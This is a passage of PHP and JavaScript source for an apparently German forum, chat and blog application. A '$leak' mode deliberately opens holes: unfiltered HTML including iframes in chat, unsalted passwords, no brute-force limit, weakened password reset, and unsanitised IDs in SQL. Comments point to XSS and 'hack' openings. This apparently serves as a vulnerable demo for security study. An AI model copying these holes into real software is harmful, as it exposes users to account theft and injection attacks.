y[z].disabled = (".(($status/2%2) ? "y[z].value == 0 || " : "")."(Math.floor(w/4)%2) && (Math.floor(w/8)%2) == B.crypt.checked) ? false : true;
else
y[z].style.display = 'none',
y[z].disabled = true;
w = C[0].split(','); // Chat Status ermitteln
if(w[7] != '-') // Verbinden mit einen User
B.quit.disabled = false, // Im Chat
B.quit.style.display = 'inline',
B.call.disabled = true,
B.call.style.display = 'none',
B.user.disabled = true,
B.crypt.disabled = true;
else {
B.quit.disabled = true, // Kein Chat
B.quit.style.display = 'none',
B.user.disabled = false,
B.crypt.disabled = false,
window.name = window.name.replace(/\w+$/,'-');
if(parseInt(B.user.value,10))
B.call.disabled = false,
B.call.style.display = 'inline';
else
B.call.disabled = true,
B.call.style.display = 'none';
}
u = document.getElementById('view');
if(w[7] > 0) { // Chat mit User gestartet
if(B.send.disabled)
u.innerHTML = '',
B.line.value = '';
u.style.backgroundColor = '#ffffff',
B.line.disabled = false,
B.send.disabled = false,
B.doit.disabled = false;
B.line.focus();
}
else // Chat mit User beendet
u.style.backgroundColor = '#eeeeee',
B.line.disabled = ((parseInt(B.user.value,10) > 0 && !B.call.disabled) ? false : true),
B.send.disabled = true,
B.doit.disabled = true;
break;
case 8: // 8:[news] Ereignisse Abfragen/Auswerten
v = y;
if(B.line.value == B.copy.value) {
E = cl(1,'news:' + E).split(';');
if(E.length == 1 && E[0] == '0') // User noch Online?
location.reload();
w = C[0]; // Alten Chat-Status retten
C = E; // Chat-Status aktualisieren
E = E[1]; // Letzte ID
if(w != C[0]) // Es gab Änderungen an den laufenden Chats
cl(7,0);
w = C[0].split(','); // Chat Erlauben/Ablehnen
u = window.name.match(/^key:(\w+),(\w+),([\w-]+)$/); // Eigene Keys (Secret-Key,Public-Key,Chat-Key)
if(w[8] != null && w[8] != '-') { // Chatanfrage bekommen
z = w[9].match(/^(?:key:(\w+):)?(.*)$/), // Public-Key vom Chat-Partner
w = w[8];
if(!cl(0,[!(typeof z[1] == 'undefined' || z[1] == ''),B.crypt.checked])
&& (B.edit[1].checked || B.edit[2].checked && confirm('Chatanfrage von:\\x20' + cl(11,w) + '\\n' + unescape(z[2])))) { // Probleme mit IE6
if(F && B.crypt.checked && z[1] && u) {
if(u[3] == '-')
window.name = window.name.replace(/-$/,(u[3] = CryptoJS.MD5(u[1] + navigator.userAgent + new Date().getTime())));
w += ',' + u[2] + ',' + CryptoJS.AES.encrypt('key:' + u[3] + ';',bigInt(z[1],F[2]).modPow(bigInt(u[1],F[2]),bigInt(F[0],F[2])).toString(F[2]));
}
}
else {
if((B.edit[1].checked || B.edit[2].checked) && cl(0,[!(typeof z[1] == 'undefined' || z[1] == ''),B.crypt.checked])) // Probleme mit IE6
cl(10,'Intern,0,<h4>' + ((z[1]) ? 'V' : 'Unv') + 'erschlüsselte Chatanfrage von:\\x20' + cl(11,w)
+ '\\x20abgelehnt!\\x20-\\x20Verschlüsselung ist ' + ((B.crypt.checked) ? 'ein' : 'aus') + 'geschaltet!<\/h4>' + unescape(z[2]));
w = '-' + w;
}
cl(1,'auth:' + w);
}
if(parseInt(C[2],10)) // Neu Nachrichten Anzeigen/Ausgeben
for(z=3;z<C.length;z++)
if((w = C[z].match(/^(\d+),(\d{4})(\d\d)(\d\d)(\d{6}),(?:key:(\w+)\/?([\/\w+=]*):)?([^\\0]*)$/))) {
if(F && u && w[6] && w[7] && w[1] == $uid && u[3] == '-') { // Schlüssel zum Entschlüsseln dabei?
u[3] = CryptoJS.AES.decrypt(w[7],bigInt(w[6],F[2]).modPow(bigInt(u[1],F[2]),bigInt(F[0],F[2])).toString(F[2]));
u[3] = String((String(u[3]).match(/^key:\w+;$/)) ? u[3] : u[3].toString(CryptoJS.enc.Latin1)).replace(/^key:(\w+);$/,'$1');
window.name = window.name.replace(/-$/,u[3]);
}
if(w[8] != '') // Leere Nachrichten überspringen
cl(10,cl(11,w[1]) + ',' + w[4] + '.' + w[3] + '.' + w[2] + ' ' + w[5].replace(/(\d\d)(?=\d)/g,'$1:')
+ ((F && u && u[3] != '-' && w[8].match(/^[\/\w+]+=+$/) && (x = w[8].match(/^(\w+)\/(.*)$/))) ? '!,'
+ (((y = CryptoJS.AES.decrypt(x[2],u[3]).toString(CryptoJS.enc.Utf8)) && CryptoJS.MD5(u[3] + ',' + y) == x[1])
? y : '<h3>Verschlüsselung fehlgeschlagen:<\/h3>' + x[2]) : ',' + unescape(w[8])));
}
}
else
B.copy.value = B.line.value;
if(v)
setTimeout('cl(8,1)',parseInt(B.wait.value,10)*1000);
break;
case 9: // 9:[edit/crypt] Ereignisse Abfragen/Auswerten
v = y;
if(y && !window.name.match(/^key:\w+,\w+,[\w-]+$/)) {// key:<secret-key>,<public-key>,<crypt-key>
try {
x = bigInt(F[0],F[2]); // prime als bigInt
y = bigInt(F[1],F[2]); // main als bigInt
z = bigInt.randBetween(y,x); // Secret-Key
window.name = 'key:' + z.toString(F[2]) + ',' + y.modPow(z,x).toString(F[2]) + ',-';
// alert('Neue Schluessel wurden erzeugt!');
}
catch(y) { // Verschlüsselung macht fehler
v = 0;
B.crypt.checked = false;
alert('Computer sagt NEIN!');
}
}
cl(1,'edit:' + ((B.edit[0].checked * 0 + B.edit[1].checked * 1 + B.edit[2].checked * 3) + v * 4)); // Neuen Status zum Forum schicken
cl(7,0); // GUI aktualisieren
break;
case 10: // 10:Inhalte Ausgeben
y = y.match(/([^,]+),([^,]+?)(!?),([^\\0]+)/);
v = /<(?!\/?(big|br|code|del|em|ins|small|strong|su[bp]|tt".(($leak) ? "|a|font|img|iframe|span)\W" : ")>").")[^\>]*>/g; // Whitelist für HTML-Inline
x = [document.getElementById('view'),document.createElement('p'),'<b>' + y[1] + '<\/b>\\x20<small>(' + ((y[2] != 0) ? y[2] : new Date().toLocaleString()) + ')<\/small>'
+ ((y[3]) ? '\\x20<span onclick=\'prompt(\"Schlüsselbund:\",window.name.replace(/^key:/,F[0] + \",\" + F[1] + \",\"))\' title=\'Verschlüsselt\'>$lock<\/span>' : ''),
y[4]".(($leak) ? "" : ".replace(v,'')")."]; // Im Sicherheitsmodus nur Inline-Elemente ohne weitere Angaben zulassen
x[1].setAttribute('class','cr');
try {
x[1].innerHTML = '<fieldset><legend>' + x[2] + '<\/legend>' + x[3] + '<\/fieldset>'; // Layout mit Block-Elementen
}
catch(e) { // Workaround for IE6
x[1].innerHTML = x[2] + '<br \/>' + x[3].replace(v,''); // Nur Inline-Elemente zulassen
}
x[0].appendChild(x[1]);
x[0].scrollTop = x[0].scrollHeight;
break;
case 11: // 11:Benutzernamen zurückgeben
return (D[y]) ? D[y] : 'Unbekannt';
}
return 0;
}
var A,B,C,D,E,F,u,v,w,x,y,z; // Vorsicht bei JMORSWXYZ (Noch frei: GHIKLNPQTUV)
try { // Rückkanalmethode festlegen
A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
B = document.chat,
D = [], // Userliste erstellen
E = '0', // Chatnachrichten-Zähler zurücksetzen
F = $a, // [$jschat[prime],$jschat[main],$jschat[base]]
y = B.user.getElementsByTagName('option'); // Benutzernamen auslesen
for(z=1;z<y.length;z++)
D[y[z].value] = y[z].firstChild.data;
y = B.wait.getElementsByTagName('option'); // Refresh-Zeiten für Ajax optimieren
for(z=0;z<y.length;z++)
y[z].style.display = 'block',
y[z].disabled = false;
B.wait.value = 10; // Refresh auf 10 Sekunden setzen
document.getElementById('view').style.display = 'block'; // Chatanzeige aktivieren
document.getElementById('sr3').style.display = 'inline'; // Chatanfragen 'Zeigen' aktivieren
if(F && typeof bigInt != 'undefined' && typeof CryptoJS != 'undefined')// Prüfen ob die Verschlüsselung möglich ist
document.getElementById('cryptchat').style.display = 'inline'; // Verschlüsselung optisch aktivieren
else
F = false, // Verschlüsselung deaktivieren, weil nicht verfügbar
B.crypt.checked = false;
cl(9,B.crypt.checked); // GUI Initialisieren
cl(8,1);")."//--></script></form>";
$out .= (isset($_GET['nojs'])) ? preg_replace("!</?noscript>|<script[^>]*>.*</script>|\son(submit|click|change)='.*?'!s",'',$var) : $var;
}
elseif(isset($_REQUEST['chat'])) { // Gästen ermöglichen Admin-Messages zu Empfangen
$out = "0";
if(preg_match('/^(news)(?::(.+))?$/',$_REQUEST['chat'],$chat) and ($var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = 0")) > ($val = intval($chat[2]))) {
$out .= ";$var;";
if($var > $val and $array = $sql['aq']($conn, /* 2 Anzahl der Messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where chat = '0' and id > $val" /* Keine Chatanfragen anzeigen (Hack ermöglichen) */."
order by id") and count($array)) {
$out .= count($array);
foreach($array as $var)
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
}
header('Content-Type: text/plain');
die($out);
}
# Eingaben von Formularen auswerten
if(count($_POST) > 0) {
if(isset($_COOKIE[session_name()]) and $_COOKIE[session_name()] == session_id()) { // Auf Gültige Session prüfen
if(!$leak and isset($_SESSION['flc']) and $_SESSION['flc'] >= $flc) { // Im Sicherheitsmodus Brute-Force erschweren
header('HTTP/1.0 403 Forbidden');
die("<h1>Verboten!</h1>");
}
# Neuanmeldung
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and (isset($_POST['register']) or isset($_POST['change']) or isset($_POST['kill']))) {
$array = array(
'username' => '[\w.-]{1,64}', 'password' => '[[:print:]]{0,64}', 'probate' => '[[:print:]]{0,64}',
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}', 'question' => '\d{0,8}',
'myquestion' => '[\w,. ?-]{0,96}', 'answer' => '[\w. -]{0,96}', 'town' => '[\w. -]{0,64}',
'info' => '[^\']{0,255}', 'born' => '(\d{2}\.\d{2}\.(19|20)\d{2})?',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)',
'page' => '((https?:\/\/)?([\w.-]+|\[[\d:a-f]+\])(:\d+)?(\/[\w:;.,_%?=&#\[\]\/-]*)?)?');
$wrt = (floor($status%4/2) and isset($_POST['id']) and preg_match('/\d*/',$_POST['id'],$var)) ? $var[0] : false;
foreach($array as $key => $var)
if(isset($_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
if(isset($post) and count($post) == count($array) and $post['password'] == $post['probate']) {
if(isset($post['born']) and $post['born']) {
$post['born'] = implode('-',array_reverse(explode('.',$post['born'])));
if(strtotime($post['born']) > time())
unset($post['born']);
}
$val = $post['probate'];
unset($post['probate']);
$salt = (!$leak) ? substr(preg_replace('/\W/','',crypt(rand().time())),-12) : false;
if($salt and $post['password'] != '')
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$post[password]-".strtolower($post['username']));
if(isset($post['question']) and isset($post['answer']) and $post['answer'] != '' and ($post['question'] or isset($post['myquestion']) and $post['myquestion'] != ''))
$post['passhelp'] = ((!$post['question'] and $post['myquestion'] != '') ? "0-$post[myquestion]:" : "$post[question]-")."$post[answer]";
foreach(array('question','myquestion','answer') as $var)
unset($post[$var]);
foreach($post as $key => $var)
$post[$key] = $sql['es']($var);
$key = '(localhost|127(\.\d{1,3}){3}|::1|[\w.-]\.xx)';
if(!$leak and array_search($val,explode(' ',$attack['_wordlist_'])) !== false)
$out .= "<h3 align='center'>Das Kennwort aus einen <a$rel$tgb href='$wiki/".urlencode("Wörterbuchangriff")."'>Wörterbuch</a> ist zu einfach - Bitte ein sicheres wählen!";
elseif($ipck and !preg_match("/@$key$/",$post['mail']) and ($var = preg_replace('/^[^@]*@/','',$post['mail'])) == gethostbyname($var))
$out .= "<h3 align='center'>Die eMail-Adresse läßt sich nicht auflösen oder ist gerade Offline!</h3>";
elseif($ipck and preg_match("/^$array[page]$/",$post['page'],$var) and count($var) > 3 and !preg_match("/^$key$/",$var[3]) and $var[3] == gethostbyname($var[3]))
$out .= "<h3 align='center'>Die Homepage-Adresse läßt sich nicht auflösen oder ist gerade Offline!</h3>";
elseif($user and isset($_POST['register']) and $post['password'] != '') {
if(!$var = $sql['aq']($conn,"
select (select username
from [user]
where username like '$post[username]') as user,
(select mail
from [user]
where mail like '$post[mail]') as mail
where user is not null
or mail is not null",SQLITE_NUM)) {
if($sql['sq']($conn,"select count(*) from [user]") == 0) // Admin
$post['status'] = 2;
if(!$sql['e']($conn,"
insert into [user] ([create],[change],[".implode("],[",array_keys($post))."])
values (datetime('now','localtime'),
datetime('now','localtime'),
'".implode("','",$post)."')"))
$out .= "<h3 align='center'>Der Benutzer konnte nicht angelegt werden!</h3>";
else
$request = 'Profil';
}
else {
$key = array();
if(!is_null($var[0][0]))
$key[] = 'Benutzername';
if(!is_null($var[0][1]))
$key[] = 'eMail-Adresse';
$out .= "<h3 align='center'>".implode(' und ',$key).((count($key) > 1) ? " sind" : " ist" )." schon im System vorhanden!</h3>";
}
}
elseif($uid and (isset($_POST['change']) or isset($_POST['kill'])) and isset($_POST['userpass'])
and ($status/2%2 or !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass'])) and ($sql['sq']($conn,"
select count(*)
from [user]
where (username like '$post[username]' or id = '$wrt')
and password='".$sql['es']($_POST['userpass'])."'") or preg_match('/^salt:(.+?)-hash:(\w+)$/',$sql['sq']($conn,"
select password
from user
where (username like '$post[username]' or id = '$wrt')"),$var) and $var[2] == $hash[0]("$var[1]-$_POST[userpass]-".strtolower($post['username'])))) {
if(isset($_POST['change'])) {
if($post['password'] == '')
if($salt and !preg_match('/^salt:\w+-hash:\w+$/',$_POST['userpass']))
$post['password'] = "salt:$salt-hash:".$hash[0]("$salt-$_POST[userpass]-".strtolower($post['username']));
else
unset($post['password']);
$array = array();
foreach($post as $key => $var)
$array[$key] = "[$key]='$var'";
$val = str_replace('=',' like ',$array['username']);
if($wrt)
$val = "($val or id = $wrt)";
@$sql['e']($conn,"
update [user] set status=0
where $val and status is null");
if(!$sql['e']($conn,"
update [user] set [change]=datetime('now','localtime'),
".implode(",",$array)."
where $val
and (status%2=1 or $status/2%2 = 1)"))
$out .= "<h3 align='center'>Ihre Daten konnten nicht geändert werden!</h3>";
else
$request = 'Profil';
}
elseif(isset($_POST['kill']) and $var = $sql['sq']($conn,"
select id
from [user]
where [username] like '$post[username]'
and (status%2=1 or $status/2%2 = 1)")) {
$sql['e']($conn,"
update [user] set
[change]=datetime('now','localtime'),
[changes]=[changes]+1,
[status]=NULL
where id=$var");
$request = '';
}
}
else
$out .= "<h3 align='center'>Ihr altes Kennwort stimmt nicht!</h3>";
}
else
$out .= "<h3 align='center'>Sie haben nicht alle Eingabefelder korrekt ausgefüllt!</h3>";
}
# Kennwort Vergessen
if(!$uid and isset($_POST['restore'])) {
$post = array();
$wrt = ($leak) ? array() : array(
'forename' => '[\w. -]{1,64}', 'lastname' => '[\w. -]{1,64}',
'mail' => '[\w.-]+@(localhost|[\w.-]+\.\w+|\[?[\d:a-f]+\]?)');
$array = array_merge($wrt,array( 'question' => '\d{1,8}',
'answer' => '[\w. -]{1,96}', 'username' => '[\w.-]{1,64}',
'password' => '[[:print:]]{1,64}', 'probate' => '[[:print:]]{1,64}'));
foreach($array as $key => $var)
if(isset($_POST[$key]) and preg_match("/$var/i",$_POST[$key],$val))
$post[$key] = strtr($val[0],$html);
if(isset($post['username']) and ($leak or isset($post['mail']) and isset($post['forename']) and isset($post['lastname']))) {
if($var=$sql['sq']($conn,"select passhelp from [user] where username like '$post[username]'".(($leak) ? "" : " and mail like '$post[mail]'")) and preg_match('/^(\d+)-(?:(?<=0-)(.+?):)?/',$var,$var)) {
if(!$post['question'] = $var[1])
$post['myquestion'] = ($var[2] != '') ? $var[2] : false;
}
else
$out .= "<h3 align='center'>Das Kennwort kann nicht zurückgesetzt werden, da keine Sicherheitsfrage hinterlegt wurde!</h3>";
if(isset($post['password']) and isset($post['probate']) and $post['password'] == $post['probate']) {
if(isset($post['question']) and isset($post['answer']) and ($leak or isset($post['forename']) and isset($post['lastname'])) and $sql['e']($conn,"
update [user]
set password='".$sql['es']($post['password'])."'
where username like '$post[username]'".(($leak) ? "" : "
and mail like '$post[mail]'
and forename like '$post[forename]'
and lastname like '$post[lastname]'")."
and passhelp like '$post[question]-".((!$post['question'] and isset($post['myquestion']) and $post['myquestion']) ? "$post[myquestion]:" : "")."$post[answer]'") and $sql['c']($conn)) {
$request = '';
$out .= "<h3 align='center'>Ihr Kennwort wurde jetzt neu gesetzt!</h3>";
$row = true;
}
else {
$out .= "<h3 align='center'>Die Sicherheitsfrage muss korrekt beantwortet werden!</h3>";
if(!$leak)
$_SESSION['flc'] = (isset($_SESSION['flc'])) ? $_SESSION['flc'] + 1 : 1;
}
}
else
$out .= "<h3 align='center'>Sie haben noch kein neues korrektes Kennwort vergeben!</h3>";
}
else
$out .= "<h3 align='center'>Sie müssen alle Felder ausfüllen!</h3>";
}
# Login durchführen
if(!$uid and ($row or isset($_POST['login'])) and isset($_POST['username']) and isset($_POST['password'])) {
$post = array( 'username' => preg_replace('/[^\w.:@\[\]-]+/','',$_POST['username']),
'password' => preg_replace('/[^[:print:]]/','',$_POST['password']));
if(($val = $sql['aq']($conn,"
select id,username,password,status,change
from [user]
where (username like '$post[username]'
or mail like '$post[username]')
and status is not null")) and $val = $val[0] and (preg_replace('/^salt:\w+-hash:\w+$/','',$post['password']) == $val['password']
or preg_match('/^salt:(.+?)-hash:(\w+)$/',$val['password'],$var) and $var[2] == $hash[0]("$var[1]-$post[password]-".strtolower($val['username']))
or !$leak and isset($_SESSION['sha']) and preg_match('/^([@\w.-]+):(\w+)$/',$post['password'],$var) and $var[1] == $post['username']
and ($var[2] == $hash[0]("$_SESSION[sha]-".$val['password']) or $var[2] == $hash[0]("$_SESSION[sha]-".preg_replace('/^salt:\w+-hash:(\w+)$/','$1',$val['password']))))) {
foreach($_SESSION as $key => $var)
unset($_SESSION[$key]);
$uid = $val['id'];
$status = floor($val['status']/2)*2+1;
$_SESSION['lua'] = $val['change'];
$_SESSION['uid'] = $uid;
$sql['e']($conn,"
update [user] set
status=(status/2%8*2+1),
logins=logins+1,
requests=requests+".((isset($_SESSION['src'])) ? $_SESSION['src'] : 0).",
change=datetime('now','localtime'),
ip='$addr',
session='".$sql['es'](session_id())."',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'".((isset($_POST['info'])) ? ",
info=nullif('".$sql['es']($_POST['info'])."','')" : "")."
where id=".$val['id']);
if(isset($_SESSION['src']))
unset($_SESSION['src']);
if(!$request and !$query)
$request = 'Profil';
if(isset($_POST['forever']) and $_POST['forever'])
setcookie('login',"$uid.".$hash[0]("$val[username]:$val[password]"),time()+$ctl,$self);
else
setcookie('username',$val['username']);
}
else {
$post['password'] = '';
if(!$leak)
$_SESSION['flc'] = (isset($_SESSION['flc'])) ? $_SESSION['flc'] + 1 : 1;
}
}
# Profil speichern
if($uid and !isset($_POST['stop']) and !isset($_POST['test']) and isset($_POST['profil']) and $sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
profil=nullif('".$sql['es']($_POST['profil'])."','')
where id=".((isset($_POST['uid']) and $_POST['uid'] != $uid and preg_match('/\d+/',$_POST['uid'],$var)) ? "$var[0]
and (select status
from [user]
where id=$_SESSION[uid])%4 = 3" : "$_SESSION[uid] and status%2=1"))) // XSS
$request = 'Profil';
# Blog Bearbeiten
if($request == 'Beitrag' and $uid and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['message']) and isset($_POST['title']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)
and $uid == $_POST['mail'] and $_POST['mail'] == $sql['sq']($conn,"select userid from [forum] where id = $var[0]") and $sql['e']($conn,"
update [forum] set".((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? "\n\t\tstatus=status/2%2*2+$val[0]%2," : "")."
change=datetime('now','localtime'),
changes=changes+1,
ip='$addr',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
title=nullif('".$sql['es'](strtr($_POST['title'],$html))."',''),
message='".$sql['es'](strtr($_POST['message'],$html))."'
where status is not null and id = $var[0]"))
$request = 'Blog';
# Forum Betrag speichern
elseif($var = array('') and isset($_POST['save']) and isset($_POST['mail']) and isset($_POST['title']) and isset($_POST['max']) and isset($_POST['message']) and $_POST['message'] != ''
and ($uid or $gast) and ($_POST['max'] == $sql['sq']($conn,'select max(id) from [forum]') or (($gast) ? 0 : $uid) != $sql['sq']($conn,"
select userid
from [forum]
where id = (select max(id)
from [forum])")) and ($_POST['mail'] == '' or preg_match('/^\d+$/',$_POST['mail'],$var) and $sql['sq']($conn,"
select id
from [user]
where status is not null and id=$var[0]")) and $sql['e']($conn,"
insert into [forum] ([create],[change],[status],[userid],[mailid],[ip],[useragent],[path],[title],[message])
values (datetime('now','localtime'),datetime('now','localtime'),
".((isset($_POST['right']) and preg_match('/[01]/',$_POST['right'],$val)) ? $val[0]%2 : 0).",
".(($uid) ? $uid : 0).",
nullif('$var[0]',''),
'$addr',
'".$sql['es']($_SERVER['HTTP_USER_AGENT'])."',
nullif('".((isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$val) and $val = $sql['sq']($conn,"select ifnull(path,'/')||id||'/' from [forum] where id=$val[0]")) ? $val : '')."',''),
nullif('".$sql['es'](strtr($_POST['title'],$html))."',''),
'".$sql['es'](strtr($_POST['message'],$html))."')"))
$request = ($var[0]) ? (($var[0] == $uid) ? 'Blog' : 'Mail') : '';
}
else
$out .= "<h3><a$rel$tgb href='$wiki/Hypertext_Transfer_Protocol#HTTP_POST'>POST-Requests</a> ohne <a$rel$tgb href='$wiki/Sitzungsbezeichner'>Session-Cookies</a> werden ignoriert!</h3>";
}
# Mails löschen
if(preg_match('/Blog|Mail/',$request) and $uid and isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var) and $uid == $sql['sq']($conn,"select mailid from [forum] where id = $var[0]"))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
# Tagline speichern
if($uid and !isset($_REQUEST['stop']) and !isset($_REQUEST['test']) and isset($_REQUEST['tl']))
$sql['e']($conn,"
update [user] set
change=datetime('now','localtime'),
changes=changes+1,
tagline=nullif('".$sql['es']($_REQUEST['tl'])."','')
where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid));
# Abmelden
if(preg_match('/^Abmelden\s?$/',$request)) {
if($sql['e']($conn,"
update [user] set status=(status/2%8*2),
chat=null,
change=datetime('now','localtime')
where ".((isset($_GET['id']) and $_GET['id']) ? "(select status%4 from [user] where id=nullif('$uid',''))=3 and id=".(($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id']))
: "id='$uid' and status%2=1")) and $sql['c']($conn) and (!$status/2%2 or !isset($_GET['id']))) {
session_unset();
if(isset($_COOKIE['login'])) {
setcookie('login',0,time()-$ctl,$self);
unset($_COOKIE['login']);
}
}
// if(substr($request,-1) != ' ')
$request = '';
$uid = $status = false;
}
# Login Forumlar
if(!$uid and (!preg_match('/^(Anmelden|Kennwort|SQL|Beitrag|Creole)$/',$request,$var) and !$info[3] and (($user or !$lone) and !$content or !is_array($content) and preg_match('/(<|<){3}login(\d?)(>|>){3}/i',$content,$var) or $request == 'Login') or !$inet and !$local and trim($request) == 'Impressum')) {
if(!(isset($post['username']) and $post['username']) and isset($_COOKIE['username']) and $_COOKIE['username'])
$post['username'] = ($leak) ? $_COOKIE['username'] : preg_replace('/^([^\w.:@\[\]-]*).*$/','$1',$_COOKIE['username']);
if(!$leak and $hash)
$head['hash'] = "<script type='text/javascript' src='$hash[1]'></script>";
$out = "<table align='right' id='lis' style='display:none'><tr><td><a href='#' title='Login einblenden' onclick='".strtr(preg_replace($js,'',"
document.getElementById('lih').style.display = 'block';
document.getElementById('lis').style.display = 'none';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<0)) + (1<<0) * 0 : 0)+ '; path=$self';
return false;
"),array('&' => '&', "'" => '"'))."'>«</a></td></tr></table>
<table align='right' id='lih' cellspacing='0' cellpadding='0'><tr><td><form name='login' action='$self".(($request) ? "/$request" : "")."' method='post'".(($leak) ? "" : " onsubmit='".strtr(preg_replace($js,'',"
if(typeof $hash[2] == 'function' && $hash[2]()) {
try { // Request vorbereiten
var a = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
a = new ActiveXObject('Microsoft.XMLHTTP');
}
a.open('GET','$self?salt=' + (x = document.login).username.value,false); // Salt vom Benutzer anfordern
a.send('');
x.password.value = x.username.value + ':' + $hash[3]('".($_SESSION['sha'] = $hash[0](time().rand().implode(":",$_SERVER)))."' + '-' + ((a=a.responseText.match(/^([\w.-]+):(\w+)$/)) ? $hash[3](a[2] + '-' + x.password.value + '-' + a[1].toLowerCase()) : x.password.value));
}"),array('&' => '&', "'" => '"'))."'").">
<fieldset><legend><b>Login</b> <a href='#' title='Login ausblenden' id='lia' style='display:none' onclick='".strtr(preg_replace($js,'',"
document.getElementById('lih').style.display = 'none';
document.getElementById('lis').style.display = 'block';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/))
? (x[2] & 65535-(1<<0)) + (1<<0) * 1 : 1<<0) + '; path=$self';
return false;
"),array('&' => '&', "'" => '"')).preg_replace($formcheck[0],$formcheck[1],"'>»</a></legend>
{username|Benutzername oder eMail:|20|64|tabindex=1}<br />{password|Kennwort:".((!$local and !$inet) ? "" : " (<a href='$self/Kennwort'>Vergessen?</a>)")."|*20|64|tabindex=2}<br />
<input type='checkbox' id='forever' name='forever' value='1' /> <label for='forever'><small title='Für ".floor($ctl/(24*60*60))." Tage'>Angemeldet bleiben</small></label><br />
<input type='hidden' name='info' value='' /><input type='submit' name='login' value='OK' tabindex='3' /><br /><br />".(($user and ($local or $inet)) ? "<a href='$self/Anmelden'>Neues Mitglied werden</a>" : ""))
."</fieldset></form></td></tr></table><script type='text/javascript'><!--\n".preg_replace($js,'',"
document.getElementById('lia').style.display = 'inline';
if(window.innerWidth && window.innerWidth < 1000 || ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) && x[2] & (1<<0))".((is_array($var) and isset($var[2]) and $var[2]) ? " || 1" : "").")
document.getElementById('lih').style.display = 'none',
document.getElementById('lis').style.display = 'block';
var x = document.login;
x.info.value = screen.width + ',' + screen.height + ',' + screen.colorDepth;
if(x.username.value == '')
x.username.focus();
else
if(x.password.value == '')
x.password.focus();
")."//login//--></script>$out";
}
# Datei-Upload
if($uid and $request == 'Datei') {
$len = $sql['sq']($conn,"select sum(abs(size)) from [file] where user = $uid and status is not null");
if(isset($_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name'])) {
$name = preg_replace('/[^\w!,.-]/','',((isset($_POST['name']) and $_POST['name'] != '') ? $_POST['name'] : $_FILES['file']['name']));
if(!$status/2%2 and ($len + $_FILES['file']['size']) > $maxfile)
$out .= "<h3>Sie haben ihren Datei-Upload Content um ".number_format(($len - $maxfile),0,',','.')." Bytes überschritten!</h3>";
elseif(!$type = array_search(strtolower(preg_replace('/^.*?\.(\w+)$/','$1',$name)),$type) and !$status/2%2)
$out .= "<h3>Ihr Datei-Upload besitzt einen nicht erlaubten Datei-Type!</h3>";
else {
$data = file_get_contents($_FILES['file']['tmp_name']);
$crc = str_pad(dechex(crc32($data)),8,0,STR_PAD_LEFT);
$size = strlen($data);
$len += $size;
$var = array_merge(array(
'[create]' => "datetime('now','localtime')",
'[status]' => (int)$_POST['right'] + (int)$_POST['status'],
'[user]' => $uid,
'[name]' => "'$name'",
'[ip]' => "'$addr'",
'[useragent]' => "nullif('".$sql['es']($_SERVER['HTTP_USER_AGENT'])."','')",
'[info]' => "nullif('".$sql['es'](strtr($_POST['info'],$html))."','')"),
($link = $sql['sq']($conn,"select id from [file] where link is null and hash = '$crc' and abs(size) = $size")) ? array('[link]' => $link) : array(
'[size]' => $size,
'[hash]' => "'$crc'",
'[type]' => (($type) ? "nullif('".preg_replace('![^\w/ ;=+-]!','',$_FILES['file']['type'])."','')" : "null"),
'[data]' => "'".base64_encode($data)."'"));
if(isset($var['[data]']) and $data = $gz['deflate']($data,9) and strlen($data) < $size) {
$var['[data]'] = "'".base64_encode($data)."'";
$var['[size]'] *= -1;
}
if($val = $sql['sq']($conn,"select id from [file] where status is not null and user = $uid and name like ".$var['[name]']." limit 1")) {
// $sql['e']($conn,"update [file] set status = null where id = $val");
$key = array();
foreach($var as $k => $v)
$key[] = "$k = $v";
if(!@$sql['e']($conn,"update [file] set\n\t".implode(",\n\t",$key)."\nwhere id = $val"))
$var = false;
}
elseif(!@$sql['e']($conn,"insert into [file] (".implode(',',array_keys($var)).") values (".implode(',',array_values($var)).")"))
$var = false;
if(!$var)
$out .= "<h3>Datei konnte nicht verarbeitet werden!</h3>";
}
}
elseif(isset($_POST['send']) and isset($_POST['id']) and preg_match('/\d+/',$_POST['id'],$var)) {
$sql['e']($conn,"
update [file] set
status = ".((int)$_POST['right'] + (int)$_POST['status']).",
name = '".preg_replace('/[^\w!&,.-]/','',$_POST['name'])."',
info = '".$sql['es']($_POST['info'])."'"
.(($status/2%2 and isset($_POST['type'])) ? ",\n\t\ttype = ".((preg_match('![\w/ ;=+-]+!',$_POST['type'],$val)) ? "'$val[0]'" : "null") : "")."
where status is not null and id = $var[0]".(($status/2%2) ? "" : " and user = $uid "));
if(isset($_POST['charset']) and preg_match('/^[\w-]+$/',$_POST['charset'],$val) and $var = $sql['aq']($conn,"
select ifnull(b.id,a.id) as id,
ifnull(b.type,a.type) as type
from [file] as a
